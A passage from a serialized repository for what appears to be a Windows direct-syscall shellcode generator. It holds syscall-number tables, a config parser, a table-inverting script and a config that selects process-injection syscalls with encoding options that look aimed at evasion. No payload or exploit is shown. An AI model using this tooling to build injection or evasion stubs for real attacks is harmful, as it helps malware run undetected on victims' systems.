\"NtUnsubscribeWnfStateChange\", \"473\": \"NtUpdateWnfStateData\", \"474\": \"NtVdmControl\", \"393691\": \"NtWaitForAlertByThreadId\", \"476\": \"NtWaitForDebugEvent\", \"1376733\": \"NtWaitForKeyedEvent\", \"1900635\": \"NtWaitForMultipleObjects\", \"1966106\": \"NtWaitForMultipleObjects32\", \"851972\": \"NtWaitForSingleObject\", \"478\": \"NtWaitForWorkViaWorkerFactory\", \"197087\": \"NtWaitHighEventPair\", \"197088\": \"NtWaitLowEventPair\", \"196609\": \"NtWorkerFactoryWorkerReady\", \"1703944\": \"NtWriteFile\", \"1703963\": \"NtWriteFileGather\", \"87\": \"NtWriteRequestData\", \"58\": \"NtWriteVirtualMemory\", \"65606\": \"NtYieldExecution\", \"493\": \"RtlGetNativeSystemInformation\"}}}" }, { "path": "start/__init__.py", "content": "from . syscall_signatures import *\r\n\r\n# from parseconf import *\r\nfrom . parseconf import *\r\n\r\n" }, { "path": "start/config.cfg", "content": "[Windows 10]\r\nr21h2 = True\r\nr22h2 = True\r\nr21h1 = False\r\nr20h2 = False\r\nr2004 = False\r\nr1909 = False\r\nr1903 = False\r\nr1809 = False\r\nr1803 = False\r\nr1709 = False\r\nr1703 = False\r\nr1607 = False\r\nr1511 = False\r\nr1507 = False\r\n\r\n[Windows 7]\r\nsp0 = False\r\nsp1 = True\r\n\r\n[Windows 11]\r\nb21h2 = False\r\nb22h2 = True\r\n\r\n[SYSCALLS]\r\nselected_syscalls = ['NtAllocateVirtualMemory', 'NtQuerySystemInformation', 'NtOpenProcess', 'NtCreateFile', 'NtCreateSection', 'NtMapViewOfSection', 'NtProtectVirtualMemory', 'NtWriteVirtualMemory', 'NtCreateThreadEx', 'NtWaitForSingleObject']\r\n\r\n[MISC]\r\nprint_string_literal_of_bytes = True\r\nshow_comments = True\r\nsyscall_style = fs\r\nintended_compiler = nasm\r\nuse_shareddata_for_win1011 = False\r\nencode_user_share_data = True\r\nusd_encode_xor_key = 0xc0de\r\nusd_encode_with_add = True\r\nusd_encode_add_val = 0xbeef\r\nget_teb_from_r12 = False\r\n\r\n" }, { "path": "start/convertSyscallsToReverse.py", "content": "import os\r\nimport json\r\nclass EMU():\r\n def __init__(self):\r\n self.maxCounter = 500000\r\n self.arch = 32\r\n self.debug = False\r\n self.breakOutOfLoops = True\r\n self.maxLoop = 50000 # to break out of loops\r\n self.entryOffset = 0\r\n self.codeCoverage = True\r\n self.beginCoverage = False\r\n self.timelessDebugging = False # todo: bramwell\r\n self.winVersion = \"Windows 10\"\r\n self.winSP = \"2004\"\r\n\r\nwith open(os.path.join(os.path.dirname(__file__), 'WinSysCalls.json'), 'r') as syscall_file:\r\n syscall_dict = json.load(syscall_file)\r\n\r\n\r\nwith open(os.path.join(os.path.dirname(__file__), 'reverseWinsysCalls.json'), 'r') as syscall_file:\r\n reverseSyscall_dict = json.load(syscall_file)\r\n\r\nem = EMU()\r\n\r\nsyscallID=18\r\nsysCallName = syscall_dict[em.winVersion][em.winSP][str(syscallID)]\r\n\r\n\r\nprint (sysCallName)\r\n\r\nd=syscall_dict\r\n# dict((v, k) for k, v, k in syscall_dict.items())\r\nnewDict={}\r\nt=0\r\ntempDictOuter0={}\r\n\r\nfor k, v in syscall_dict.items():\r\n\t# print (k)\r\n\r\n\tif t<330:\r\n\t\tprint (v, type (v))\r\n\t\ttempDictOuter={}\r\n\t\tfor p_id, p_info in v.items():\r\n\t\t\tprint (\"***\")\r\n\t\t\tprint(\"\\nos_release:\", p_id)\r\n\r\n\t\t\ttempDict={}\r\n\t\t\tfor key in p_info:\r\n\t\t\t\t# print(key + ':', p_info[key])\r\n\t\t\t\t# print(p_info[key]+ ':'+ key)\r\n\t\t\t\ttempDict[p_info[key]] = int(key)\r\n\t\t\t# print (len(tempDict), \"tempDict\")\r\n\t\t\t# print (tempDict)\r\n\t\t\ttempDictOuter[p_id]=tempDict\r\n\tt+=1\r\n\ttempDictOuter0[k]=tempDictOuter\r\n\r\nprint (len(tempDictOuter0), \"tempDictOuter0\")\r\nprint (tempDictOuter0)\r\n# print (newDict)\r\nmy_map=newDict\r\n\r\n# inv_map = {v: k for k, v in newDict.items()}\r\n# print (inv_map)\r\n\r\n# for p_id, p_info in newDict.items():\r\n# \tprint (\"***\")\r\n# \tprint(\"\\nos_release:\", p_id)\r\n\r\n# \tfor key in p_info:\r\n# \t\tprint(key + ':', p_info[key])\r\n# \t\tprint(p_info[key]+ ':'+ key)\r\n\r\n\r\nstring1=\"\"\"random line\r\nrandom line\r\npop eax\r\npop edi\r\n\"\"\"\r\n\r\nrandom2=\"\"\"pop edx\r\n\"\"\"\r\n\r\n# print (string1+random2)\r\n\r\n# inv_map = dict(zip(newDict.values(), newDict.keys()))\r\n\r\n# print (em.winVersion, em.winSP)\r\n# sysCallName = reverseSyscall_dict[em.winVersion][em.winSP][\"NtAllocateVirtualMemory\"]\r\n# print (sysCallName)\r\n" }, { "path": "start/myKeys.py", "content": "\r\nOPENAI_API_KEY=\"putYourKeyHere\"\r\n" }, { "path": "start/parseconf.py", "content": "import os\r\nimport configparser\r\n\r\nfrom .singleton import Singleton\r\n\r\n\r\nclass Configuration(metaclass=Singleton):\r\n\r\n def __init__(self, cfgFile):\r\n self.cfgFile = cfgFile\r\n\r\n\r\n def readConf(self):\r\n conf = configparser.RawConfigParser()\r\n _path = os.path.join(\r\n os.path.dirname(os.path.abspath(__file__)), self.cfgFile\r\n )\r\n conf.read(_path)\r\n self.config = conf\r\n return conf\r\n\r\n def changeConf(self, *args):\r\n # print (\"changeConf\")\r\n conf = configparser.RawConfigParser()\r\n _path = os.path.join(\r\n os.path.dirname(os.path.abspath(__file__)), self.cfgFile\r\n )\r\n conf.read(_path)\r\n self.config = conf\r\n self.args = args[0]\r\n\r\n \r\n list_windows10 = self.config.items('Windows 10')\r\n list_windows11 = self.config.items('Windows 11')\r\n list_windows7 = self.config.items('Windows 7')\r\n\r\n list_Syscalls = self.config.items('SYSCALLS')\r\n list_Misc = self.config.items('MISC')\r\n\r\n\r\n # sharem_search = self.config.items('SHAREM SEARCH')\r\n # sharem_syscalls = self.config.items('SHAREM SYSCALLS')\r\n # sharem_decoder = self.config.items('SHAREM DECRYPT')\r\n # sharem_emulation = self.config.items('SHAREM EMULATION')\r\n # sharem_disassembly = self.config.items('SHAREM DISASSEMBLY')\r\n\r\n for key, val in self.args.items():\r\n for x in list_windows10:\r\n if(key in x):\r\n self.config['Windows 10'][str(key)] = str(val)\r\n # print(self.config['Windows 10'][str(key)],str(val))\r\n \r\n for key, val in self.args.items():\r\n for x in list_windows7:\r\n if(key in x):\r\n self.config['Windows 7'][str(key)] = str(val)\r\n \r\n for key, val in self.args.items():\r\n for x in list_windows11:\r\n if(key in x):\r\n self.config['Windows 11'][str(key)] = str(val)\r\n \r\n for key, val in self.args.items():\r\n for x in list_Syscalls:\r\n if(key in x):\r\n self.config['SYSCALLS'][str(key)] = str(val)\r\n\r\n for key, val in self.args.items():\r\n for x in list_Misc:\r\n if(key in x):\r\n self.config['MISC'][str(key)] = str(val)\r\n \r\n # print(\"Key: \", key, \"Val: \", val)\r\n # print(vars(self.config))\r\n\r\n\r\n # if \"pushret\" in self.args:\r\n # self.config['SHAREM SEARCH']['pushret'] = str(self.args['pushret'])\r\n \r\n\r\n\r\n\r\n #save = self.save() \r\n def save(self):\r\n # print(\"saving\")\r\n _path = os.path.join(\r\n os.path.dirname(os.path.abspath(__file__)), self.cfgFile\r\n )\r\n with open(_path, \"w\") as configfile:\r\n self.config.write(configfile)\r\n # print(configfile)\r\n # print(\"done\")\r\n" }, { "path": "start/reverseWinSyscalls.json", "content": "\r\n{\"Windows XP\": {\"SP1\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAddBootEntry\": \"102\", \"NtAddDriverEntry\": \"103\", \"NtAdjustGroupsToken\": \"104\", \"NtAlertResumeThread\": \"105\", \"NtAlertThread\": \"106\", \"NtAllocateLocallyUniqueId\": \"107\", \"NtAllocateUserPhysicalPages\": \"108\", \"NtAllocateUuids\": \"109\", \"NtAreMappedFilesTheSame\": \"110\", \"NtAssignProcessToJobObject\": \"111\", \"NtCancelDeviceWakeupRequest\": \"112\", \"NtCompactKeys\": \"113\", \"NtCompareTokens\": \"114\", \"NtCompleteConnectPort\": \"115\", \"NtCompressKey\": \"116\", \"NtConnectPort\": \"117\", \"NtCreateDebugObject\": \"118\", \"NtCreateDirectoryObject\": \"119\", \"NtCreateEventPair\": \"120\", \"NtCreateIoCompletion\": \"121\", \"NtCreateJobObject\": \"122\", \"NtCreateJobSet\": \"123\", \"NtCreateKeyedEvent\": \"124\", \"NtCreateMailslotFile\": \"125\", \"NtCreateMutant\": \"126\", \"NtCreateNamedPipeFile\": \"127\", \"NtCreatePagingFile\": \"128\", \"NtCreatePort\": \"129\", \"NtCreateProcess\": \"130\", \"NtCreateProfile\": \"131\", \"NtCreateSemaphore\": \"132\", \"NtCreateSymbolicLinkObject\": \"133\", \"NtCreateTimer\": \"134\", \"NtCreateToken\": \"135\", \"NtCreateWaitablePort\": \"136\", \"NtDebugActiveProcess\": \"137\", \"NtDebugContinue\": \"138\", \"NtDeleteAtom\": \"139\", \"NtDeleteBootEntry\": \"140\", \"NtDeleteDriverEntry\": \"141\", \"NtDeleteFile\": \"142\", \"NtDeleteKey\": \"143\", \"NtDeleteObjectAuditAlarm\": \"144\", \"NtDeleteValueKey\": \"145\", \"NtDisplayString\": \"146\", \"NtEnumerateBootEntries\": \"147\", \"NtEnumerateDriverEntries\": \"148\", \"NtEnumerateSystemEnvironmentValuesEx\": \"149\", \"NtExtendSection\": \"150\", \"NtFilterToken\": \"151\", \"NtFlushInstructionCache\": \"152\", \"NtFlushKey\": \"153\", \"NtFlushVirtualMemory\": \"154\", \"NtFlushWriteBuffer\": \"155\", \"NtFreeUserPhysicalPages\": \"156\", \"NtGetContextThread\": \"157\", \"NtGetCurrentProcessorNumber\": \"158\", \"NtGetDevicePowerState\": \"159\", \"NtGetPlugPlayEvent\": \"160\", \"NtGetWriteWatch\": \"161\", \"NtImpersonateAnonymousToken\": \"162\", \"NtImpersonateThread\": \"163\", \"NtInitializeRegistry\": \"164\", \"NtInitiatePowerAction\": \"165\", \"NtIsSystemResumeAutomatic\": \"166\", \"NtListenPort\": \"167\", \"NtLoadDriver\": \"168\", \"NtLoadKey\": \"169\", \"NtLoadKey2\": \"170\", \"NtLoadKeyEx\": \"171\", \"NtLockFile\": \"172\", \"NtLockProductActivationKeys\": \"173\", \"NtLockRegistryKey\": \"174\", \"NtLockVirtualMemory\": \"175\", \"NtMakePermanentObject\": \"176\", \"NtMakeTemporaryObject\": \"177\", \"NtMapUserPhysicalPages\": \"178\", \"NtModifyBootEntry\": \"179\", \"NtModifyDriverEntry\": \"180\", \"NtNotifyChangeDirectoryFile\": \"181\", \"NtNotifyChangeKey\": \"182\", \"NtNotifyChangeMultipleKeys\": \"183\", \"NtOpenEventPair\": \"184\", \"NtOpenIoCompletion\": \"185\", \"NtOpenJobObject\": \"186\", \"NtOpenKeyedEvent\": \"187\", \"NtOpenMutant\": \"188\", \"NtOpenObjectAuditAlarm\": \"189\", \"NtOpenProcessToken\": \"190\", \"NtOpenSemaphore\": \"191\", \"NtOpenSymbolicLinkObject\": \"192\", \"NtOpenThread\": \"193\", \"NtOpenTimer\": \"194\", \"NtPlugPlayControl\": \"195\", \"NtPrivilegeCheck\": \"196\", \"NtPrivilegeObjectAuditAlarm\": \"197\", \"NtPrivilegedServiceAuditAlarm\": \"198\", \"NtPulseEvent\": \"199\", \"NtQueryBootEntryOrder\": \"200\", \"NtQueryBootOptions\": \"201\", \"NtQueryDebugFilterState\": \"202\", \"NtQueryDirectoryObject\": \"203\", \"NtQueryDriverEntryOrder\": \"204\", \"NtQueryEaFile\": \"205\", \"NtQueryFullAttributesFile\": \"206\", \"NtQueryInformationAtom\": \"207\", \"NtQueryInformationJobObject\": \"208\", \"NtQueryInformationPort\": \"209\", \"NtQueryInstallUILanguage\": \"210\", \"NtQueryIntervalProfile\": \"211\", \"NtQueryIoCompletion\": \"212\", \"NtQueryMultipleValueKey\": \"213\", \"NtQueryMutant\": \"214\", \"NtQueryOpenSubKeys\": \"215\", \"NtQueryOpenSubKeysEx\": \"216\", \"NtQueryPortInformationProcess\": \"217\", \"NtQueryQuotaInformationFile\": \"218\", \"NtQuerySecurityObject\": \"219\", \"NtQuerySemaphore\": \"220\", \"NtQuerySymbolicLinkObject\": \"221\", \"NtQuerySystemEnvironmentValue\": \"222\", \"NtQuerySystemEnvironmentValueEx\": \"223\", \"NtQueryTimerResolution\": \"224\", \"NtRaiseException\": \"225\", \"NtRaiseHardError\": \"226\", \"NtRegisterThreadTerminatePort\": \"227\", \"NtReleaseKeyedEvent\": \"228\", \"NtRemoveProcessDebug\": \"229\", \"NtRenameKey\": \"230\", \"NtReplaceKey\": \"231\", \"NtReplyWaitReplyPort\": \"232\", \"NtRequestDeviceWakeup\": \"233\", \"NtRequestPort\": \"234\", \"NtRequestWakeupLatency\": \"235\", \"NtResetEvent\": \"236\", \"NtResetWriteWatch\": \"237\", \"NtRestoreKey\": \"238\", \"NtResumeProcess\": \"239\", \"NtSaveKey\": \"240\", \"NtSaveKeyEx\": \"241\", \"NtSaveMergedKeys\": \"242\", \"NtSecureConnectPort\": \"243\", \"NtSetBootEntryOrder\": \"244\", \"NtSetBootOptions\": \"245\", \"NtSetContextThread\": \"246\", \"NtSetDebugFilterState\": \"247\", \"NtSetDefaultHardErrorPort\": \"248\", \"NtSetDefaultLocale\": \"249\", \"NtSetDefaultUILanguage\": \"250\", \"NtSetDriverEntryOrder\": \"251\", \"NtSetEaFile\": \"252\", \"NtSetHighEventPair\": \"253\", \"NtSetHighWaitLowEventPair\": \"254\", \"NtSetInformationDebugObject\": \"255\", \"NtSetInformationJobObject\": \"256\", \"NtSetInformationKey\": \"257\", \"NtSetInformationToken\": \"258\", \"NtSetIntervalProfile\": \"259\", \"NtSetIoCompletion\": \"260\", \"NtSetLdtEntries\": \"261\", \"NtSetLowEventPair\": \"262\", \"NtSetLowWaitHighEventPair\": \"263\", \"NtSetQuotaInformationFile\": \"264\", \"NtSetSecurityObject\": \"265\", \"NtSetSystemEnvironmentValue\": \"266\", \"NtSetSystemEnvironmentValueEx\": \"267\", \"NtSetSystemInformation\": \"268\", \"NtSetSystemPowerState\": \"269\", \"NtSetSystemTime\": \"270\", \"NtSetThreadExecutionState\": \"271\", \"NtSetTimerResolution\": \"272\", \"NtSetUuidSeed\": \"273\", \"NtSetVolumeInformationFile\": \"274\", \"NtShutdownSystem\": \"275\", \"NtSignalAndWaitForSingleObject\": \"276\", \"NtStartProfile\": \"277\", \"NtStopProfile\": \"278\", \"NtSuspendProcess\": \"279\", \"NtSuspendThread\": \"280\", \"NtSystemDebugControl\": \"281\", \"NtTerminateJobObject\": \"282\", \"NtTestAlert\": \"283\", \"NtTranslateFilePath\": \"284\", \"NtUnloadDriver\": \"285\", \"NtUnloadKey\": \"286\", \"NtUnloadKey2\": \"287\", \"NtUnloadKeyEx\": \"288\", \"NtUnlockFile\": \"289\", \"NtUnlockVirtualMemory\": \"290\", \"NtVdmControl\": \"291\", \"NtWaitForDebugEvent\": \"292\", \"NtWaitForKeyedEvent\": \"293\", \"NtWaitHighEventPair\": \"294\", \"NtWaitLowEventPair\": \"295\"}, \"SP2\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAddBootEntry\": \"102\", \"NtAddDriverEntry\": \"103\", \"NtAdjustGroupsToken\": \"104\", \"NtAlertResumeThread\": \"105\", \"NtAlertThread\": \"106\", \"NtAllocateLocallyUniqueId\": \"107\", \"NtAllocateUserPhysicalPages\": \"108\", \"NtAllocateUuids\": \"109\", \"NtAreMappedFilesTheSame\": \"110\", \"NtAssignProcessToJobObject\": \"111\", \"NtCancelDeviceWakeupRequest\": \"112\", \"NtCompactKeys\": \"113\", \"NtCompareTokens\": \"114\", \"NtCompleteConnectPort\": \"115\", \"NtCompressKey\": \"116\", \"NtConnectPort\": \"117\", \"NtCreateDebugObject\": \"118\", \"NtCreateDirectoryObject\": \"119\", \"NtCreateEventPair\": \"120\", \"NtCreateIoCompletion\": \"121\", \"NtCreateJobObject\": \"122\", \"NtCreateJobSet\": \"123\", \"NtCreateKeyedEvent\": \"124\", \"NtCreateMailslotFile\": \"125\", \"NtCreateMutant\": \"126\", \"NtCreateNamedPipeFile\": \"127\", \"NtCreatePagingFile\": \"128\", \"NtCreatePort\": \"129\", \"NtCreateProcess\": \"130\", \"NtCreateProfile\": \"131\", \"NtCreateSemaphore\": \"132\", \"NtCreateSymbolicLinkObject\": \"133\", \"NtCreateTimer\": \"134\", \"NtCreateToken\": \"135\", \"NtCreateWaitablePort\": \"136\", \"NtDebugActiveProcess\": \"137\", \"NtDebugContinue\": \"138\", \"NtDeleteAtom\": \"139\", \"NtDeleteBootEntry\": \"140\", \"NtDeleteDriverEntry\": \"141\", \"NtDeleteFile\": \"142\", \"NtDeleteKey\": \"143\", \"NtDeleteObjectAuditAlarm\": \"144\", \"NtDeleteValueKey\": \"145\", \"NtDisplayString\": \"146\", \"NtEnumerateBootEntries\": \"147\", \"NtEnumerateDriverEntries\": \"148\", \"NtEnumerateSystemEnvironmentValuesEx\": \"149\", \"NtExtendSection\": \"150\", \"NtFilterToken\": \"151\", \"NtFlushInstructionCache\": \"152\", \"NtFlushKey\": \"153\", \"NtFlushVirtualMemory\": \"154\", \"NtFlushWriteBuffer\": \"155\", \"NtFreeUserPhysicalPages\": \"156\", \"NtGetContextThread\": \"157\", \"NtGetCurrentProcessorNumber\": \"158\", \"NtGetDevicePowerState\": \"159\", \"NtGetPlugPlayEvent\": \"160\", \"NtGetWriteWatch\": \"161\", \"NtImpersonateAnonymousToken\": \"162\", \"NtImpersonateThread\": \"163\", \"NtInitializeRegistry\": \"164\", \"NtInitiatePowerAction\": \"165\", \"NtIsSystemResumeAutomatic\": \"166\", \"NtListenPort\": \"167\", \"NtLoadDriver\": \"168\", \"NtLoadKey\": \"169\", \"NtLoadKey2\": \"170\", \"NtLoadKeyEx\": \"171\", \"NtLockFile\": \"172\", \"NtLockProductActivationKeys\": \"173\", \"NtLockRegistryKey\": \"174\", \"NtLockVirtualMemory\": \"175\", \"NtMakePermanentObject\": \"176\", \"NtMakeTemporaryObject\": \"177\", \"NtMapUserPhysicalPages\": \"178\", \"NtModifyBootEntry\": \"179\", \"NtModifyDriverEntry\": \"180\", \"NtNotifyChangeDirectoryFile\": \"181\", \"NtNotifyChangeKey\": \"182\", \"NtNotifyChangeMultipleKeys\": \"183\", \"NtOpenEventPair\": \"184\", \"NtOpenIoCompletion\": \"185\", \"NtOpenJobObject\": \"186\", \"NtOpenKeyedEvent\": \"187\", \"NtOpenMutant\": \"188\", \"NtOpenObjectAuditAlarm\": \"189\", \"NtOpenProcessToken\": \"190\", \"NtOpenSemaphore\": \"191\", \"NtOpenSymbolicLinkObject\": \"192\", \"NtOpenThread\": \"193\", \"NtOpenTimer\": \"194\", \"NtPlugPlayControl\": \"195\", \"NtPrivilegeCheck\": \"196\", \"NtPrivilegeObjectAuditAlarm\": \"197\", \"NtPrivilegedServiceAuditAlarm\": \"198\", \"NtPulseEvent\": \"199\", \"NtQueryBootEntryOrder\": \"200\", \"NtQueryBootOptions\": \"201\", \"NtQueryDebugFilterState\": \"202\", \"NtQueryDirectoryObject\": \"203\", \"NtQueryDriverEntryOrder\": \"204\", \"NtQueryEaFile\": \"205\", \"NtQueryFullAttributesFile\": \"206\", \"NtQueryInformationAtom\": \"207\", \"NtQueryInformationJobObject\": \"208\", \"NtQueryInformationPort\": \"209\", \"NtQueryInstallUILanguage\": \"210\", \"NtQueryIntervalProfile\": \"211\", \"NtQueryIoCompletion\": \"212\", \"NtQueryMultipleValueKey\": \"213\", \"NtQueryMutant\": \"214\", \"NtQueryOpenSubKeys\": \"215\", \"NtQueryOpenSubKeysEx\": \"216\", \"NtQueryPortInformationProcess\": \"217\", \"NtQueryQuotaInformationFile\": \"218\", \"NtQuerySecurityObject\": \"219\", \"NtQuerySemaphore\": \"220\", \"NtQuerySymbolicLinkObject\": \"221\", \"NtQuerySystemEnvironmentValue\": \"222\", \"NtQuerySystemEnvironmentValueEx\": \"223\", \"NtQueryTimerResolution\": \"224\", \"NtRaiseException\": \"225\", \"NtRaiseHardError\": \"226\", \"NtRegisterThreadTerminatePort\": \"227\", \"NtReleaseKeyedEvent\": \"228\", \"NtRemoveProcessDebug\": \"229\", \"NtRenameKey\": \"230\", \"NtReplaceKey\": \"231\", \"NtReplyWaitReplyPort\": \"232\", \"NtRequestDeviceWakeup\": \"233\", \"NtRequestPort\": \"234\", \"NtRequestWakeupLatency\": \"235\", \"NtResetEvent\": \"236\", \"NtResetWriteWatch\": \"237\", \"NtRestoreKey\": \"238\", \"NtResumeProcess\": \"239\", \"NtSaveKey\": \"240\", \"NtSaveKeyEx\": \"241\", \"NtSaveMergedKeys\": \"242\", \"NtSecureConnectPort\": \"243\", \"NtSetBootEntryOrder\": \"244\", \"NtSetBootOptions\": \"245\", \"NtSetContextThread\": \"246\", \"NtSetDebugFilterState\": \"247\", \"NtSetDefaultHardErrorPort\": \"248\", \"NtSetDefaultLocale\": \"249\", \"NtSetDefaultUILanguage\": \"250\", \"NtSetDriverEntryOrder\": \"251\", \"NtSetEaFile\": \"252\", \"NtSetHighEventPair\": \"253\", \"NtSetHighWaitLowEventPair\": \"254\", \"NtSetInformationDebugObject\": \"255\", \"NtSetInformationJobObject\": \"256\", \"NtSetInformationKey\": \"257\", \"NtSetInformationToken\": \"258\", \"NtSetIntervalProfile\": \"259\", \"NtSetIoCompletion\": \"260\", \"NtSetLdtEntries\": \"261\", \"NtSetLowEventPair\": \"262\", \"NtSetLowWaitHighEventPair\": \"263\", \"NtSetQuotaInformationFile\": \"264\", \"NtSetSecurityObject\": \"265\", \"NtSetSystemEnvironmentValue\": \"266\", \"NtSetSystemEnvironmentValueEx\": \"267\", 